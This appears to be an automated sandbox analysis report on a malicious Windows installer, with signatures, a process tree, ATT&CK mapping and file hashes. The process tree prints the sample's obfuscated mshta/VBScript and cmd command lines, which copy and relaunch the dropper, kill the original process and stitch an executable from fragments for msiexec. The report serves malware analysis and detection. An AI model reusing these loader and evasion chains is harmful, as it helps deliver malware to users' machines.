6851b72e0bfaf608294bcac6ffef07e5e6591aee8b94ce9afad46b6e6cc32a59

Resubmissions

27-10-2021 14:44

211027-r4madafbg6 10

27-10-2021 14:28

211027-rs7f6sfah4 10

Analysis

max time kernel
110s
max time network
1564s
submitted
01-01-1970 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_installer/Wed094c47c32b.exe

Score

8^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

XYB0bVL96aEKhA.exE

pid process

904 XYB0bVL96aEKhA.exE
Loads dropped DLL 1 IoCs

Processes:

msiexec.exe

pid process

368 msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1032 taskkill.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

taskkill.exe

description pid process

Token: SeDebugPrivilege 1032 taskkill.exe

pid	process
904	XYB0bVL96aEKhA.exE

pid	process
368	msiexec.exe

pid	process
1032	taskkill.exe

description	pid	process
Token: SeDebugPrivilege	1032	taskkill.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

Wed094c47c32b.exemshta.execmd.exeXYB0bVL96aEKhA.exEmshta.exemshta.execmd.exe

description	pid	process	target process
PID 3748 wrote to memory of 2512	3748	Wed094c47c32b.exe	mshta.exe
PID 3748 wrote to memory of 2512	3748	Wed094c47c32b.exe	mshta.exe
PID 3748 wrote to memory of 2512	3748	Wed094c47c32b.exe	mshta.exe
PID 2512 wrote to memory of 932	2512	mshta.exe	cmd.exe
PID 2512 wrote to memory of 932	2512	mshta.exe	cmd.exe
PID 2512 wrote to memory of 932	2512	mshta.exe	cmd.exe
PID 932 wrote to memory of 904	932	cmd.exe	XYB0bVL96aEKhA.exE
PID 932 wrote to memory of 904	932	cmd.exe	XYB0bVL96aEKhA.exE
PID 932 wrote to memory of 904	932	cmd.exe	XYB0bVL96aEKhA.exE
PID 932 wrote to memory of 1032	932	cmd.exe	taskkill.exe
PID 932 wrote to memory of 1032	932	cmd.exe	taskkill.exe
PID 932 wrote to memory of 1032	932	cmd.exe	taskkill.exe
PID 904 wrote to memory of 3692	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 904 wrote to memory of 3692	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 904 wrote to memory of 3692	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 3692 wrote to memory of 2624	3692	mshta.exe	cmd.exe
PID 3692 wrote to memory of 2624	3692	mshta.exe	cmd.exe
PID 3692 wrote to memory of 2624	3692	mshta.exe	cmd.exe
PID 904 wrote to memory of 2096	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 904 wrote to memory of 2096	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 904 wrote to memory of 2096	904	XYB0bVL96aEKhA.exE	mshta.exe
PID 2096 wrote to memory of 2320	2096	mshta.exe	cmd.exe
PID 2096 wrote to memory of 2320	2096	mshta.exe	cmd.exe
PID 2096 wrote to memory of 2320	2096	mshta.exe	cmd.exe
PID 2320 wrote to memory of 2960	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2960	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2960	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2028	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2028	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 2028	2320	cmd.exe	cmd.exe
PID 2320 wrote to memory of 368	2320	cmd.exe	msiexec.exe
PID 2320 wrote to memory of 368	2320	cmd.exe	msiexec.exe
PID 2320 wrote to memory of 368	2320	cmd.exe	msiexec.exe

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
2⤵
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"
3⤵
- Suspicious use of WriteProcessMemory
PID:932

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))
5⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"
6⤵
PID:2624

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))
5⤵
- Suspicious use of WriteProcessMemory
PID:2096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t
6⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
7⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"
7⤵
PID:2028

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\PEQQN6S.OU
7⤵
- Loads dropped DLL
PID:368

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im "Wed094c47c32b.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9Odf.6
MD5
b259839b9455f04e8299f22cebe3274f

SHA1
30bbbc8d5089648c8c5425c23874976ba2e07b34

SHA256
edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89

SHA512
3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t
MD5
ac6ad5d9b99757c3a878f2d275ace198

SHA1
439baa1b33514fb81632aaf44d16a9378c5664fc

SHA256
9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d

SHA512
bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

Download Submit
C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU
MD5
a2feb31d070b6920981b5461baa1ef81

SHA1
8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7

SHA256
ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950

SHA512
b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

Download Submit
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
MD5
b5cfd3a9dc9e645e24c79991bca60460

SHA1
0d6bcdca2121d279bbe87c66cab515ac2478f555

SHA256
852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

SHA512
55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
MD5
b5cfd3a9dc9e645e24c79991bca60460

SHA1
0d6bcdca2121d279bbe87c66cab515ac2478f555

SHA256
852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768

SHA512
55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF
MD5
cd4352def1a81b4fe232eeb2c77dbc57

SHA1
9fb4f9a790efe3676915699bdc89ba0a06ce8210

SHA256
93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c

SHA512
1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

Download Submit
\Users\Admin\AppData\Local\Temp\PEQqN6S.Ou
MD5
a2feb31d070b6920981b5461baa1ef81

SHA1
8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7

SHA256
ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950

SHA512
b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

Download Submit
memory/368-141-0x0000000005330000-0x00000000053CA000-memory.dmp

Filesize
616KB

Download
memory/368-140-0x0000000005280000-0x000000000532F000-memory.dmp

Filesize
700KB

Download
memory/368-138-0x0000000004FD0000-0x00000000050FB000-memory.dmp

Filesize
1.2MB

Download
memory/368-139-0x00000000051C0000-0x0000000005275000-memory.dmp

Filesize
724KB

Download
memory/368-133-0x0000000000000000-mapping.dmp

Download
memory/368-134-0x0000000002B40000-0x0000000002B41000-memory.dmp

Filesize
4KB

Download
memory/368-135-0x0000000002B40000-0x0000000002B41000-memory.dmp

Filesize
4KB

Download
memory/904-120-0x0000000000000000-mapping.dmp

Download
memory/932-119-0x0000000000000000-mapping.dmp

Download
memory/1032-123-0x0000000000000000-mapping.dmp

Download
memory/2028-129-0x0000000000000000-mapping.dmp

Download
memory/2096-126-0x0000000000000000-mapping.dmp

Download
memory/2320-127-0x0000000000000000-mapping.dmp

Download
memory/2512-118-0x0000000000000000-mapping.dmp

Download
memory/2624-125-0x0000000000000000-mapping.dmp

Download
memory/2960-128-0x0000000000000000-mapping.dmp

Download
memory/3692-124-0x0000000000000000-mapping.dmp

Download